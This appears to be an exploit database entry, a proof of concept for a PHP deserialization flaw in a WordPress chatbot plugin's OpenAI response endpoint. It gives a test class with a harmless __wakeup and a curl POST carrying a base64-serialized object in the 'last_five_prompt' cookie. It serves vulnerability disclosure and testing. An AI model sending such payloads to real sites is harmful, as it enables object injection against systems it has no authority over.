## https://sploitus.com/exploit?id=WPEX-ID:7D7FE498-0AA3-4FA7-B560-610B42B2ABED
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, when a GPT engine is set as Open AI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the below request to trigger the unserialisation:
curl -X 'POST' -b 'last_five_prompt=Tzo0OiJFdmlsIjowOnt9' 'https://example.com/wp-admin/admin-ajax.php?action=openai_response'
Tzo0OiJFdmlsIjowOnt9 being the base64 of O:4:"Evil":0:{}